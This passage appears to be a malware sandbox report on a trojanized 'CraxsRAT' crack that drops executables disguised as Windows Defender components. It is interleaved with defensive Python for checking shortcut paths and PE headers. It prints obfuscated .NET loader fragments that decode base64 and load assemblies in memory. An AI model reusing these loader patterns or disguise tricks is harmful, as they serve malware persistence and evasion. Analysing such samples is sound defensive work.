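    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    off = header_size
    if flags & HAS_LINK_TARGET_IDLIST:            # IDListSize (u16) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    fields = {}
    for bit, key in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        raw = data[off:off + count * width]
        off += count * width
        fields[key] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def resolve_target(lnk_dir: str, relative_path: str) -> str:
    """Windows resolves RELATIVE_PATH against the directory holding the .lnk."""
    return ntpath.normpath(ntpath.join(lnk_dir, relative_path))


def escapes_directory(lnk_dir: str, target: str) -> bool:
    """True when the resolved target lies outside the shortcut's own directory."""
    base = ntpath.normpath(lnk_dir).lower().rstrip("\\") + "\\"
    return not target.lower().startswith(base)


def build_sample_lnk(relative_path: str) -> bytes:
    """Constructed minimal shortcut: header plus a Unicode RELATIVE_PATH, nothing else."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_RELATIVE_PATH | IS_UNICODE)
    header += b"\0" * (0x4C - len(header))
    return header + struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")


if __name__ == "__main__":
    sample = build_sample_lnk(r"..\..\..\..\..\Windows Defender Notification.exe")
    fields = parse_lnk_strings(sample)
    target = resolve_target(STARTUP_DIR, fields["relative_path"])
    print(fields["relative_path"], "->", target,
          "(escapes Startup)" if escapes_directory(STARTUP_DIR, target) else "")
```

Resolving the five-level relative path from the Startup folder gives C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, which is the same binary the report shows loading mscoree.dll from %APPDATA% further down; a Startup shortcut whose target climbs out of its own directory into a user-writable location is the pattern to alert on.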
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: CraxsRAT v7.6 Cracked.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: CraxsRAT v7.6 Cracked.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: CraxsRAT v7.6 Cracked.exe Static file information: File size 89198592 > 1048576
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: CraxsRAT v7.6 Cracked.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5507000
Source: CraxsRAT v7.6 Cracked.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs .Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: CraxsRat.exe.0.dr Static PE information: 0xF9BEEE5F [Wed Oct 11 19:54:07 2102 UTC]
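The timestamp line above and the static PE information lines earlier in this section (virtual size of .text above 0x100000, the COM descriptor data directory, the DllCharacteristics flags) all come from a few header fields. The following is an added example, not code from the report or the sandbox: it walks DOS header, COFF header, optional header and section table with struct, decodes the TimeDateStamp (0xF9BEEE5F is 11 Oct 2102, a build time that cannot be genuine) and compares it with the clock, flags an oversized .text section, lists the DllCharacteristics bits and detects a managed image through IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR. The image it inspects is constructed with those header values; the 0x100000 threshold mirrors the report's and the CLR header RVA/size are placeholders.

```python
"""Static PE header triage. Added example; the sample image is constructed."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
DLL_CHARACTERISTICS = {          # IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]           # 0x10B PE32, 0x20B PE32+
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in both formats
    dd_base = opt + (96 if magic == 0x10B else 112)           # first data directory entry
    com_rva, com_size = struct.unpack_from(
        "<II", data, dd_base + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    sections, sec = [], opt + opt_size
    for _ in range(nsections):
        name, vsize, _vaddr, rawsize, _rawptr = struct.unpack_from("<8sIIII", data, sec)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": rawsize})
        sec += 40
    return {
        "timestamp": timestamp,
        "compiled": EPOCH + timedelta(seconds=timestamp),
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        "is_dotnet": com_rva != 0 and com_size != 0,
        "sections": sections,
    }


def triage(pe: dict, now_ts=None, max_text=0x100000) -> list:
    """Return the findings the sandbox printed for this header, as strings."""
    now = EPOCH + timedelta(seconds=now_ts) if now_ts is not None else datetime.now(timezone.utc)
    findings = []
    if pe["compiled"] > now:
        findings.append(f"timestamp in the future: {pe['compiled']:%a %b %d %H:%M:%S %Y UTC}")
    for s in pe["sections"]:
        if s["name"] == ".text" and s["virtual_size"] > max_text:
            findings.append(f"virtual size of .text 0x{s['virtual_size']:X} > 0x{max_text:X}")
    if pe["is_dotnet"]:
        findings.append("IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present (managed image)")
    return findings


def build_sample(timestamp=0xF9BEEE5F, text_vsize=0x5507000) -> bytes:
    """Constructed PE32 header with one .text section; headers only, no code."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x0400 | 0x8000)  # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR,
                     0x2008, 0x48)                                       # placeholder CLR header
    text = struct.pack("<8sIIIIIIHHI", b".text", text_vsize, 0x2000, text_vsize,
                       0x200, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    pe = parse_pe(build_sample())
    print(pe["compiled"], pe["dll_characteristics"])
    for finding in triage(pe):
        print("-", finding)
```

A future-dated TimeDateStamp is a cheap signal and a cheap one to forge, so treat it as corroboration of the other findings rather than proof of anything on its own; a tool that wants the full picture would also compare SizeOfRawData with VirtualSize per section, as the report does on the line about 0x5507000.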
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Code function: 10_2_00007FF848F200BD pushad ; iretd 10_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848E1D2A5 pushad ; iretd 16_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848F3B238 push esp; retf 4810h 16_2_00007FF848F3B2A7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848F3B9FA push E85A9AD7h; ret 16_2_00007FF848F3BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF849002316 push 8B485F92h; iretd 16_2_00007FF84900231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FF848E2D2A5 pushad ; iretd 19_2_00007FF848E2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FF848F4120A push E95BD305h; ret 19_2_00007FF848F41239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FF848F419DB pushad ; ret 19_2_00007FF848F419E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FF849012316 push 8B485F91h; iretd 19_2_00007FF84901231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FF848E2D2A5 pushad ; iretd 21_2_00007FF848E2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FF848F4BA7D push E85A99D7h; ret 21_2_00007FF848F4BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FF849012316 push 8B485F91h; iretd 21_2_00007FF84901231B
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Code function: 27_2_00007FF848F200BD pushad ; iretd 27_2_00007FF848F200C1
Source: Windows Defender Notification.exe.0.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: Windows Defender Notification.exe.0.dr, v9OXbFpunZ.cs High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: Windows Defender Notification.exe.0.dr, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: Windows Defender Notification.exe.0.dr, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: Windows Defender Notification.exe.0.dr, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: Windows Defender Notification.exe.0.dr, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: Windows Defender Notification.exe.0.dr, uUAcd1V7wC.cs High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: Windows Defender Notification.exe.0.dr, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
